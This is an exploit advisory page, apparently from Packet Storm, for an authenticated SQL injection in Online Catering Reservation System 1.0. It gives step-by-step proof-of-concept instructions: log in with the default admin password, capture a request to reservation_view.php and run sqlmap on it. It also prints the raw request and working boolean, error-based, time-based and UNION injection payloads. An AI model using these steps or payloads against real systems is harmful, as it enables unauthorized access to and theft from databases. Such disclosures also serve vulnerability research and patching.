what you don't know can hurt you

Online Catering Reservation System 1.0 SQL Injection

Online Catering Reservation System 1.0 SQL Injection
Posted Feb 26, 2021
Authored by sML

Online Catering Reservation System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 53624ef7c395d83227fd97f6182a148d

Online Catering Reservation System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Online Catering Reservation System - SQL Injection 
(Authenticated)
# Date: 2021-02-25
# Exploit Author: sml@lacashita.com
# Vendor Homepage:
https://www.sourcecodester.com/php/11355/online-catering-reservation.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip
# Version: v1.0
# Tested on: Ubuntu 20.04.2

Parameter id in reservation_view.php is vulnerable to SQL Injection.

POC
---
1) Visit http://VICTIM/admin/
2) Put the default pass: 123
3) Go to Reservation->Confirmed Reservation -> View reservation or visit
http://VICTIM/admin/reservation_view.php?id=1.
4) Save the request using Burp Suite as yourfile.txt
5) sqlmap -r yourfile.txt

REQUEST
-------
GET /admin/reservation_view.php?id=1 HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: sid=8spj19f306lim9ve5hg9iq56sf; lang=CZ;
PHPSESSID=mdmn8a55hibuh8pav5serqhum1
Upgrade-Insecure-Requests: 1


SQLMAP OUTPUT
-------------
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL
comment)
Payload: id=1' OR NOT 3039=3039#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 9283 FROM(SELECT
COUNT(*),CONCAT(0x716b6b7171,(SELECT
(ELT(9283=9283,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xbWN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1' OR SLEEP(5)-- hENp

Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: id=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7171,0x535a755264454a726a6350517146596d615a77595a71666a63524372725a4a506a7973684a567251,0x717a6a7071)#
Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    15 Files
  • 14
    Apr 14th
    27 Files
  • 15
    Apr 15th
    19 Files
  • 16
    Apr 16th
    7 Files
  • 17
    Apr 17th
    1 Files
  • 18
    Apr 18th
    1 Files
  • 19
    Apr 19th
    19 Files
  • 20
    Apr 20th
    18 Files
  • 21
    Apr 21st
    30 Files
  • 22
    Apr 22nd
    18 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close